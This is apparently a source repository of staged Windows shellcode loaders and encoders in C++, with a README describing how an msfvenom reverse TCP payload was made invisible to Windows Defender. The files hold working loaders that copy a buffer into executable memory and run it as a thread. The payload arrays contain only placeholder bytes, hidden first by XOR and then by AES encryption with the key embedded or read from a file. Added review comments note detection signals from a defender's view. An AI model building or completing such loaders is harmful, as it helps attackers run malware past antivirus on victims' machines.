├── 1BasicShellcodeLoader
    └── Source.cpp
├── 2BasicShellcodeInjectorWithEncoder
    └── Source.cpp
├── 2TripleXorEncoder
    └── Source.cpp
├── 3AESEncryptedShellcodeLoader
    └── Main.cpp
├── 3AESShellcodeCipher
    └── Main.cpp
├── 4AESShellcodeLoader_RetrieveKeyFromFile
    └── Main.cpp
├── 4GenerateKey
    └── Source.cpp
└── README.md


/1BasicShellcodeLoader/Source.cpp:
--------------------------------------------------------------------------------
// NOTE(review): the header names after #include are missing from this listing;
// the calls below presumably need <Windows.h> and <stdio.h> — confirm against
// the repository.
#include
#include

// Exercise stage 1: copy a byte array into newly allocated executable memory
// and start a thread at that address. The array here holds only 0x90
// placeholder bytes.
//
// Returns 1 if VirtualAlloc fails, otherwise 0.
//
// Defender view: nothing in this stage is obscured. The bytes sit in the image
// as a plain array, and at run time the process commits a private
// PAGE_EXECUTE_READWRITE region and starts a thread whose entry point lies
// inside that region rather than inside a loaded module. Both are standard
// memory-scanner and EDR signals, independent of the bytes that are copied.
int main() {
    // Change me!
    unsigned char shellcode[] =
    { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };

    LPVOID basePageAddress;

    // Allocate memory
    // The region is requested readable, writable and executable in one call.
    basePageAddress = VirtualAlloc(
        NULL,                       //LPVOID lpAddress,
        (SIZE_T)sizeof(shellcode),  //SIZE_T dwSize,
        MEM_COMMIT | MEM_RESERVE,   //DWORD flAllocationType,
        PAGE_EXECUTE_READWRITE      //DWORD flProtect
    );

    if (basePageAddress == NULL) {
        // NOTE(review): GetLastError() returns a DWORD; %d expects an int.
        printf("[x] Could not allocate memory. Error: %d", GetLastError());
        return 1;
    }

    // Write memory
    memcpy(
        basePageAddress,            //void *dest,
        &shellcode,                 //const void *src,
        (size_t)sizeof(shellcode)   //size_t count
    );

    // Create thread that points to shellcode
    // The returned thread handle is discarded, so the call's result is neither
    // checked nor closed.
    CreateThread(
        NULL,                                       //LPSECURITY_ATTRIBUTES lpThreadAttributes,
        NULL,                                       //SIZE_T dwStackSize,
        (LPTHREAD_START_ROUTINE)basePageAddress,    //LPTHREAD_START_ROUTINE lpStartAddress,
        NULL,                                       //__drv_aliasesMem LPVOID lpParameter,
        0,                                          //DWORD dwCreationFlags,
        NULL                                        //LPDWORD lpThreadId
    );

    // Wait for new thread to spawn
    // Fixed one-second delay; main returns afterwards whatever the thread's state.
    Sleep(1000);


    return 0;
}

--------------------------------------------------------------------------------
/2BasicShellcodeInjectorWithEncoder/Source.cpp:
--------------------------------------------------------------------------------
// NOTE(review): header names are missing from this listing (see the calls used
// below) — confirm against the repository.
#include
#include

// XORs each of the first `size` bytes of `buf`, in place, with 0x42, 0x43 and
// 0x44 in turn. XOR is its own inverse, so the same call both encodes and
// decodes.
//
// Defender view: 0x42 ^ 0x43 ^ 0x44 == 0x45, so the three passes are equivalent
// to one single-byte XOR with 0x45. That changes the bytes stored in the file
// and nothing else; trying all 256 single-byte keys recovers the original
// buffer.
void TripleXor(unsigned char* buf, int size) {
    const unsigned char encoderChar = '\x42';
    for (int i = 0; i < size; i++) {
        for (int j = 0; j < 3; j++)
        {
            buf[i] = buf[i] ^ (encoderChar + j);
        }

    }
}

// Exercise stage 2: decode the embedded buffer with TripleXor, then perform the
// same allocate / copy / CreateThread sequence as stage 1.
//
// Returns 1 if VirtualAlloc fails, otherwise 0.
//
// Defender view: only the on-disk bytes differ from stage 1. After decoding,
// the original bytes are present in this process's memory and are copied into
// a private RWX region that becomes a thread start address, so behavioural and
// memory-scanning detections apply unchanged.
int main() {
    // Change me! Pre-encoded shellcode
    unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90";

    LPVOID basePageAddress;

    // sizeof - 1 leaves the string literal's terminating NUL undecoded; the
    // allocation and copy below use sizeof and therefore include that NUL.
    TripleXor(shellcode, sizeof(shellcode)-1);

    // Allocate memory
    basePageAddress = VirtualAlloc( NULL, (SIZE_T)sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );

    if (basePageAddress == NULL) {
        // NOTE(review): GetLastError() returns a DWORD; %d expects an int.
        printf("[x] Could not allocate memory. Error: %d", GetLastError());
        return 1;
    }

    // Write memory
    memcpy( basePageAddress, &shellcode, (size_t)sizeof(shellcode) );

    // Create thread that points to shellcode
    // The returned thread handle is discarded (not checked, not closed).
    CreateThread( NULL, NULL, (LPTHREAD_START_ROUTINE)basePageAddress, NULL, 0, NULL );

    //Wait for the new thread to spawn
    // Fixed one-second delay; main returns afterwards whatever the thread's state.
    Sleep(1000);

    return 0;
}

--------------------------------------------------------------------------------
/2TripleXorEncoder/Source.cpp:
--------------------------------------------------------------------------------
// NOTE(review): the header name is missing from this listing; printf is used
// below, so presumably <stdio.h> — confirm against the repository.
#include

// XORs each of the first `size` bytes of `buf`, in place, with 0x42, 0x43 and
// 0x44 in turn (net effect: XOR with 0x45). Counterpart of the TripleXor in
// 2BasicShellcodeInjectorWithEncoder; the constant is declared `const char`
// here and `const unsigned char` there, which gives the same values for
// 0x42..0x44.
void TripleXor(unsigned char* buf, int size) {
    const char encoderChar = '\x42';
    for (int i = 0; i < size; i++) {
        for (int j = 0; j < 3; j++) {
            buf[i] = buf[i] ^ (encoderChar + j);
        }

    }
}

// Prints `size`, then the first `size` bytes of `buf` as a quoted C string
// literal made of two-digit "\xNN" escapes.
void PrintHex(unsigned char* buf, int size) {
    printf("Buffer size: %d\n", size);
    printf("\"");
    for (int i = 0; i < size; i++) {
        // The line break is emitted before the byte at index 15, 31, ..., so
        // the first output line carries 15 bytes and later lines 16. No break
        // is emitted when that byte is the last one.
        if ((i % 16 == 15) && (i != size - 1)) {
            printf("\"\n\"");
        }
        printf("\\x");
        // %x prints no leading zero, so pad values below 0x10 by hand.
        if (buf[i] < (unsigned char)'\x10') {
            printf("0");
        }
        printf("%x", buf[i]);
    }
    printf("\"\n");
}

// Helper for stage 2: prints the embedded buffer, encodes it in place with
// TripleXor, and prints it again. sizeof(buf)-1 excludes the string literal's
// terminating NUL from both the printout and the encoding.
int main() {
    // Change me! msfvenom output here
    unsigned char buf[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

    printf("Buffer before encoding:\n");
    PrintHex(buf, sizeof(buf)-1);

    TripleXor(buf, sizeof(buf)-1);
    printf("Buffer after encoding:\n");
    PrintHex(buf, sizeof(buf)-1);

    return 0;
}

--------------------------------------------------------------------------------
/3AESEncryptedShellcodeLoader/Main.cpp:
--------------------------------------------------------------------------------
// NOTE(review): the first header name is missing from this listing — confirm
// against the repository.
#include
#include "AES.h" // https://github.com/SergeyBel/AES

// Exercise stage 3: decrypt an embedded buffer with the third-party AES class
// (DecryptECB, key embedded in this function), then perform the same
// allocate / copy / CreateThread sequence as the earlier stages.
//
// Returns 1 if VirtualAlloc fails (no message is printed), otherwise 0.
//
// Defender view: the ciphertext and its 16-byte key are both constants in this
// one binary, so the plaintext can be recovered offline from the file alone.
// At run time the plaintext exists in decipheredBuffer and again in the private
// RWX region that becomes a thread start address, so memory scanning and
// behavioural detections see the same thing as in stage 1.
int main() {
    // Change me! Pre-encrypted shellcode
    unsigned char cipheredBuffer[] =
    { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };

    unsigned char key[] = { 0x43, 0x5e, 0x3b, 0xde, 0x6a, 0x10, 0x07, 0x3f, 0x3a, 0xf9, 0xa1, 0x5a, 0xd3, 0x11, 0x03, 0xd0 };
    unsigned int size = sizeof(cipheredBuffer);

    // Decrypt payload
    // AES(128) presumably selects a 128-bit key, matching the 16-byte array
    // above — confirm against AES.h.
    AES aes(128);
    // NOTE(review): ownership of the returned buffer is not visible here; it is
    // never released in this function.
    unsigned char* decipheredBuffer = aes.DecryptECB(cipheredBuffer, size, key);

    // Allocate memory
    LPVOID basePageAddress = VirtualAlloc( NULL, (SIZE_T)size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );

    if (basePageAddress == NULL) {
        return 1;
    }

    // Write memory
    memcpy( basePageAddress, decipheredBuffer, (size_t)size );

    // Create thread that points to shellcode
    // The returned thread handle is discarded (not checked, not closed).
    CreateThread( NULL, NULL, (LPTHREAD_START_ROUTINE)basePageAddress, NULL, 0, NULL );

    //Wait for the new thread to spawn
    // Fixed one-second delay; main returns afterwards whatever the thread's state.
    Sleep(1000);

    return 0;
}

--------------------------------------------------------------------------------
/3AESShellcodeCipher/Main.cpp:
--------------------------------------------------------------------------------
// NOTE(review): the first header name is missing from this listing; printf is
// used below, so presumably <stdio.h> — confirm against the repository.
#include
#include "AES.h" //https://github.com/SergeyBel/AES

// Helper for stage 3: encrypts the embedded array with a hard-coded 16-byte key
// (the same bytes the stage 3 loader embeds), decrypts it again, and prints the
// plaintext, the ciphertext and the round-tripped plaintext as hex, followed by
// the buffer size.
int main() {
    // Change me! Shellcode from msfvenom here. Must be padded to be 16-byte aligned.
    unsigned char shellcode[] =
    { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };

    unsigned char key[] = { 0x43, 0x5e, 0x3b, 0xde, 0x6a, 0x10, 0x07, 0x3f, 0x3a, 0xf9, 0xa1, 0x5a, 0xd3, 0x11, 0x03, 0xd0 };
    unsigned int outLen = 0;
    unsigned int size = sizeof(shellcode);

    AES aes(128);

    printf("Before encryption:\n");
    aes.printHexArray(shellcode, size);
    printf("\n\n");

    // NOTE(review): outLen is handed to EncryptECB (presumably to receive the
    // ciphertext length) but is never read afterwards; the print and decrypt
    // calls below use `size`.
    unsigned char* cipheredBuffer = aes.EncryptECB(shellcode, size, key, outLen);

    printf("After encryption:\n");
    aes.printHexArray(cipheredBuffer, size);
    printf("\n\n");

    unsigned char* decipheredBuffer = aes.DecryptECB(cipheredBuffer, size, key);

    printf("After decryption:\n");
    aes.printHexArray(decipheredBuffer, size);
    printf("\n\n");

    printf("Size of buffer: %d\n", size);

    // NOTE(review): neither returned buffer is released in this function;
    // ownership is not visible from here.
    return 0;
}

--------------------------------------------------------------------------------
/4AESShellcodeLoader_RetrieveKeyFromFile/Main.cpp:
--------------------------------------------------------------------------------
// NOTE(review): the first header name is missing from this listing — confirm
// against the repository.
#include
#include "AES.h" // https://github.com/SergeyBel/AES

// Exercise stage 4: same as stage 3, except that the 16-byte key is read from
// "key.bin" (a relative path, so resolved against the current working
// directory) instead of being embedded in the binary.
//
// Returns 1 if VirtualAlloc fails (no message is printed), otherwise 0.
//
// Defender view: the binary now carries the ciphertext without its key, so the
// file on its own does not yield the plaintext; key.bin is the companion
// artefact to collect during triage. Run-time behaviour after decryption is
// unchanged from the earlier stages: a private RWX allocation, a copy into it,
// and a thread started inside that region.
int main() {
    // Change me! Pre-encrypted shellcode
    unsigned char cipheredBuffer[] =
    { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };

    unsigned char key[0x10];
    FILE *f;

    // Loading key from external file
    // NOTE(review): the results of fopen_s and fread are ignored. If key.bin
    // cannot be opened, f is passed to fread/fclose without being valid, and
    // key is used uninitialised if fewer than 16 bytes are read.
    fopen_s(&f, "key.bin","rb");
    fread(key,sizeof(key),1,f);
    fclose(f);

    unsigned int size = sizeof(cipheredBuffer);

    // Decrypt payload
    AES aes(128);
    // NOTE(review): ownership of the returned buffer is not visible here; it is
    // never released in this function.
    unsigned char* decipheredBuffer = aes.DecryptECB(cipheredBuffer, size, key);

    // Allocate memory
    LPVOID basePageAddress = VirtualAlloc( NULL, (SIZE_T)size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );

    if (basePageAddress == NULL) {
        return 1;
    }

    // Write memory
    memcpy( basePageAddress, decipheredBuffer, (size_t)size );

    // Create thread that points to shellcode
    // The returned thread handle is discarded (not checked, not closed).
    CreateThread( NULL, NULL, (LPTHREAD_START_ROUTINE)basePageAddress, NULL, 0, NULL );

    //Wait for the thread to run
    // Fixed one-second delay; main returns afterwards whatever the thread's state.
    Sleep(1000);

    return 0;
}

--------------------------------------------------------------------------------
/4GenerateKey/Source.cpp:
--------------------------------------------------------------------------------
// NOTE(review): the header name is missing from this listing; FILE and fwrite
// are used below, so presumably <stdio.h> — confirm against the repository.
#include

// Helper for stage 4: writes a hard-coded 16-byte key (the same bytes the
// stage 3 sources embed) to "key.bin" in the current working directory.
int main() {
    unsigned char key[] = { 0x43, 0x5e, 0x3b, 0xde, 0x6a, 0x10, 0x07, 0x3f, 0x3a, 0xf9, 0xa1, 0x5a, 0xd3, 0x11, 0x03, 0xd0 };

    FILE* f;

    // NOTE(review): the results of fopen_s and fwrite are ignored; if the file
    // cannot be created, f is passed to fwrite/fclose without being valid.
    fopen_s(&f, "key.bin", "wb");
    fwrite(key, sizeof(key), 1, f);
    fclose(f);

    return 0;
}

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Stageless Malware Obfuscation Exercises
These folders contain the different stages that took a basic **msfvenom** reverse TCP payload and made it invisible to **Windows Defender**.
--------------------------------------------------------------------------------